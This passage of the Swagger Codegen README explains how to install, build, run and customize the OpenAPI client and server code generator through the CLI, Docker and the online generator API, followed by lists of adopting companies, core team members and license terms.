v2.2.1](https://github.com/swagger-api/swagger-codegen/tree/v2.2.1) 2.1.6 | 2016-04-06 | 1.0, 1.1, 1.2, 2.0 | [tag v2.1.6](https://github.com/swagger-api/swagger-codegen/tree/v2.1.6) 2.0.17 | 2014-08-22 | 1.1, 1.2 | [tag v2.0.17](https://github.com/swagger-api/swagger-codegen/tree/v2.0.17) 1.0.4 | 2012-04-12 | 1.0, 1.1 | [tag v1.0.4](https://github.com/swagger-api/swagger-codegen/tree/swagger-codegen_2.9.1-1.1) ### Prerequisites If you're looking for the latest stable version, you can grab it directly from Maven.org (Java 7 runtime at a minimum): ``` wget http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar -O swagger-codegen-cli.jar java -jar swagger-codegen-cli.jar help ``` On a mac, it's even easier with `brew`: ``` brew install swagger-codegen ``` To build from source, you need the following installed and available in your $PATH: * [Java 7 or 8](http://java.oracle.com) * [Apache maven 3.3.3 or greater](http://maven.apache.org/) #### OS X Users Don't forget to install Java 7 or 8. You probably have 1.6. Export JAVA_HOME in order to use the supported Java version: ``` export JAVA_HOME=`/usr/libexec/java_home -v 1.8` export PATH=${JAVA_HOME}/bin:$PATH ``` ### Building After cloning the project, you can build it from source with this command: ``` mvn clean package ``` ### Homebrew To install, run `brew install swagger-codegen` Here is an example usage: ``` swagger-codegen generate -i http://petstore.swagger.io/v2/swagger.json -l ruby -o /tmp/test/ ``` ### Docker #### Development in docker You can use `run-in-docker.sh` to do all development. This script maps your local repository to `/gen` in the docker container. It also maps `~/.m2/repository` to the appropriate container location. To execute `mvn package`: ``` git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen ./run-in-docker.sh mvn package ``` Build artifacts are now accessible in your working directory. Once built, `run-in-docker.sh` will act as an executable for swagger-codegen-cli. To generate code, you'll need to output to a directory under `/gen` (e.g. `/gen/out`). For example: ``` ./run-in-docker.sh help # Executes 'help' command for swagger-codegen-cli ./run-in-docker.sh langs # Executes 'langs' command for swagger-codegen-cli ./run-in-docker.sh /gen/bin/go-petstore.sh # Builds the Go client ./run-in-docker.sh generate -i modules/swagger-codegen/src/test/resources/2_0/petstore.yaml \ -l go -o /gen/out/go-petstore -DpackageName=petstore # generates go client, outputs locally to ./out/go-petstore ``` #### Run Docker in Vagrant Prerequisite: install [Vagrant](https://www.vagrantup.com/downloads.html) and [VirtualBox](https://www.virtualbox.org/wiki/Downloads). ``` git clone http://github.com/swagger-api/swagger-codegen.git cd swagger-codegen vagrant up vagrant ssh cd /vagrant ./run-in-docker.sh mvn package ``` #### Public Pre-built Docker images - https://hub.docker.com/r/swaggerapi/swagger-generator/ (official web service) - https://hub.docker.com/r/swaggerapi/swagger-codegen-cli/ (official CLI) ##### Swagger Generator Docker Image The Swagger Generator image can act as a self-hosted web application and API for generating code. This container can be incorporated into a CI pipeline, and requires at least two HTTP requests and some docker orchestration to access generated code. Example usage (note this assumes `jq` is installed for command line processing of JSON): ``` # Start container and save the container id CID=$(docker run -d swaggerapi/swagger-generator) # allow for startup sleep 5 # Get the IP of the running container GEN_IP=$(docker inspect --format '{{.NetworkSettings.IPAddress}}' $CID) # Execute an HTTP request and store the download link RESULT=$(curl -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" }' 'http://localhost:8188/api/gen/clients/javascript' | jq '.link' | tr -d '"') # Download the generated zip and redirect to a file curl $RESULT > result.zip # Shutdown the swagger generator image docker stop $CID && docker rm $CID ``` In the example above, `result.zip` will contain the generated client. ##### Swagger Codegen CLI Docker Image The Swagger Codegen image acts as a standalone executable. It can be used as an alternative to installing via homebrew, or for developers who are unable to install Java or upgrade the installed version. To generate code with this image, you'll need to mount a local location as a volume. Example: ``` docker run --rm -v ${PWD}:/local swaggerapi/swagger-codegen-cli generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l go \ -o /local/out/go ``` The generated code will be located under `./out/go` in the current directory. ## Getting Started To generate a PHP client for http://petstore.swagger.io/v2/swagger.json, please run the following ```sh git clone https://github.com/swagger-api/swagger-codegen cd swagger-codegen mvn clean package java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l php \ -o /var/tmp/php_api_client ``` (if you're on Windows, replace the last command with `java -jar modules\swagger-codegen-cli\target\swagger-codegen-cli.jar generate -i http://petstore.swagger.io/v2/swagger.json -l php -o c:\temp\php_api_client`) You can also download the JAR (latest release) directly from [maven.org](http://central.maven.org/maven2/io/swagger/swagger-codegen-cli/2.2.2/swagger-codegen-cli-2.2.2.jar) To get a list of **general** options available, please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar help generate` To get a list of PHP specified options (which can be passed to the generator with a config file via the `-c` option), please run `java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l php` ## Generators ### To generate a sample client library You can build a client against the swagger sample [petstore](http://petstore.swagger.io) API as follows: ``` ./bin/java-petstore.sh ``` (On Windows, run `.\bin\windows\java-petstore.bat` instead) This will run the generator with this command: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java ``` with a number of options. You can get the options with the `help generate` command: ``` NAME swagger-codegen-cli generate - Generate code with chosen lang SYNOPSIS swagger-codegen-cli generate [(-a <authorization> | --auth <authorization>)] [--additional-properties <additional properties>] [--api-package <api package>] [--artifact-id <artifact id>] [--artifact-version <artifact version>] [(-c <configuration file> | --config <configuration file>)] [-D <system properties>] [--group-id <group id>] (-i <spec file> | --input-spec <spec file>) [--import-mappings <import mappings>] [--instantiation-types <instantiation types>] [--invoker-package <invoker package>] (-l <language> | --lang <language>) [--language-specific-primitives <language specific primitives>] [--library <library>] [--model-package <model package>] [(-o <output directory> | --output <output directory>)] [(-s | --skip-overwrite)] [(-t <template directory> | --template-dir <template directory>)] [--type-mappings <type mappings>] [(-v | --verbose)] OPTIONS -a <authorization>, --auth <authorization> adds authorization headers when fetching the swagger definitions remotely. Pass in a URL-encoded string of name:header with a comma separating multiple values --additional-properties <additional properties> sets additional properties that can be referenced by the mustache templates in the format of name=value,name=value --api-package <api package> package for generated api classes --artifact-id <artifact id> artifactId in generated pom.xml --artifact-version <artifact version> artifact version in generated pom.xml -c <configuration file>, --config <configuration file> Path to json configuration file. File content should be in a json format {"optionKey":"optionValue", "optionKey1":"optionValue1"...} Supported options can be different for each language. Run config-help -l {lang} command for language specific config options. -D <system properties> sets specified system properties in the format of name=value,name=value --group-id <group id> groupId in generated pom.xml -i <spec file>, --input-spec <spec file> location of the swagger spec, as URL or file (required) --import-mappings <import mappings> specifies mappings between a given class and the import that should be used for that class in the format of type=import,type=import --instantiation-types <instantiation types> sets instantiation type mappings in the format of type=instantiatedType,type=instantiatedType.For example (in Java): array=ArrayList,map=HashMap. In other words array types will get instantiated as ArrayList in generated code. --invoker-package <invoker package> root package for generated code -l <language>, --lang <language> client language to generate (maybe class name in classpath, required) --language-specific-primitives <language specific primitives> specifies additional language specific primitive types in the format of type1,type2,type3,type3. For example: String,boolean,Boolean,Double --library <library> library template (sub-template) --model-package <model package> package for generated models -o <output directory>, --output <output directory> where to write the generated files (current dir by default) -s, --skip-overwrite specifies if the existing files should be overwritten during the generation. -t <template directory>, --template-dir <template directory> folder containing the template files --type-mappings <type mappings> sets mappings between swagger spec types and generated code types in the format of swaggerType=generatedType,swaggerType=generatedType. For example: array=List,map=Map,string=String --reserved-words-mappings <import mappings> specifies how a reserved name should be escaped to. Otherwise, the default _<name> is used. For example id=identifier -v, --verbose verbose mode ``` You can then compile and run the client, as well as unit tests against it: ``` cd samples/client/petstore/java mvn package ``` Other languages have petstore samples, too: ``` ./bin/android-petstore.sh ./bin/java-petstore.sh ./bin/objc-petstore.sh ``` ### Generating libraries from your server It's just as easy--just use the `-i` flag to point to either a server or file. ### Modifying the client library format Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own. You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy. ### Making your own codegen modules If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries: ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \ -o output/myLibrary -n myClientCodegen -p com.my.company.codegen ``` This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic. You would then compile your library in the `output/myLibrary` folder with `mvn package` and execute the codegen like such: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` For Windows users, you will need to use `;` instead of `:` in the classpath, e.g. ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar;modules/swagger-codegen-cli/target/swagger-codegen-cli.jar io.swagger.codegen.SwaggerCodegen ``` Note the `myClientCodegen` is an option now, and you can use the usual arguments for generating your library: ``` java -cp output/myLibrary/target/myClientCodegen-swagger-codegen-1.0.0.jar:modules/swagger-codegen-cli/target/swagger-codegen-cli.jar \ io.swagger.codegen.SwaggerCodegen generate -l myClientCodegen\ -i http://petstore.swagger.io/v2/swagger.json \ -o myClient ``` ### Where is Javascript??? See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require static code generation. There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a OpenAPI Specification. :exclamation: On Dec 7th 2015, a Javascript API client generator has been added by @jfiala. ### Generating a client from local files If you don't want to call your server, you can save the OpenAPI Spec files into a directory and pass an argument to the code generator like this: ``` -i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json ``` Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane. ### Selective generation You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output: The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated: ``` # generate only models java -Dmodels {opts} # generate only apis java -Dapis {opts} # generate only supporting files java -DsupportingFiles # generate models and supporting files java -Dmodels -DsupportingFiles ``` To control the specific files being generated, you can pass a CSV list of what you want: ``` # generate the User and Pet models only -Dmodels=User,Pet # generate the User model and the supportingFile `StringUtil.java`: -Dmodels=User -DsupportingFiles=StringUtil.java ``` To control generation of docs and tests for api and models, pass false to the option. For api, these options are `-DapiTests=false` and `-DapiDocs=false`. For models, `-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ``` # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ``` # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ``` $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java AkkaScalaClientCodegen.java AndroidClientCodegen.java AspNet5ServerCodegen.java AspNetCoreServerCodegen.java AsyncScalaClientCodegen.java BashClientCodegen.java CSharpClientCodegen.java ClojureClientCodegen.java CsharpDotNet2ClientCodegen.java DartClientCodegen.java FlashClientCodegen.java FlaskConnexionCodegen.java GoClientCodegen.java HaskellServantCodegen.java JMeterCodegen.java JavaCXFServerCodegen.java JavaClientCodegen.java JavaInflectorServerCodegen.java JavaJerseyServerCodegen.java JavaResteasyServerCodegen.java JavascriptClientCodegen.java NodeJSServerCodegen.java NancyFXServerCodegen ObjcClientCodegen.java PerlClientCodegen.java PhpClientCodegen.java PythonClientCodegen.java Qt5CPPGenerator.java RubyClientCodegen.java ScalaClientCodegen.java ScalatraServerCodegen.java SilexServerCodegen.java SinatraServerCodegen.java SlimFrameworkServerCodegen.java SpringMVCServerCodegen.java StaticDocCodegen.java StaticHtmlGenerator.java SwaggerGenerator.java SwaggerYamlGenerator.java SwiftCodegen.java TizenClientCodegen.java TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ``` { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes sortParamsByRequiredFlag Sort method arguments to place required parameters before optional parameters. Default: true invokerPackage root package for generated code groupId groupId in generated pom.xml artifactId artifactId in generated pom.xml artifactVersion artifact version in generated pom.xml sourceFolder source folder for generated code localVariablePrefix prefix for generated code members and local variables serializableModel boolean - toggle "implements Serializable" for generated models library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` Pet=my.models.MyPet,Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ``` cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ``` cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ``` mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ``` cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ``` curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ``` { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ``` { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ``` { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ``` curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Conplement](http://www.conplement.de/) - [Cummins] (http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocuSign](https://www.docusign.com) - [Ergon](http://www.ergon.ch/) - [EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [FH Münster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [Germin8](http://www.germin8.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [HashData](http://www.hashdata.cn/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Intent HQ](http://www.intenthq.com) - [Interactive Intelligence](http://developer.mypurecloud.com/) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [MailMojo](https://mailmojo.no/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sàrl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [SRC](https://www.src.si/) - [Stingray](http://www.stingray.com) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [TaskData](http://www.taskdata.com/) - [ThoughtWorks](https://www.thoughtworks.com) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - [W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | Java Play Framework | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsum (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Akka-Scala: @cchafer * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Groovy: @victorgit * Go: @wing328 * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofi2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Javascript/NodeJS: @jfiala * Javascript (Closure-annotated Angular) @achew22 * JMeter @davidkiss * Perl: @wing328 * Swift: @tkqubo * Swift 3: @hexelon * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * Java Play Framework: @JFCote * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * JAX-RS RestEasy (JBoss EAP): @jfiala * PHP Lumen: @abcsum * PHP Slim: @jfastnacht * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Scala Finch: @jimschubert * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to [email protected] (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Evangelist Swagger Codegen Evangelist shoulders one or more of the following responsibilities: - publishes articles on the benefit of Swagger Codegen - organizes local Meetups - presents the benefits of Swagger Codegen in local Meetups or conferences - actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D) - submits PRs to improve Swagger Codegen - reviews PRs submitted by the others - ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors) If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to [email protected] (@wing328) ### List of Swagger Codegen Evangelists - Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016) - [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem) - [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
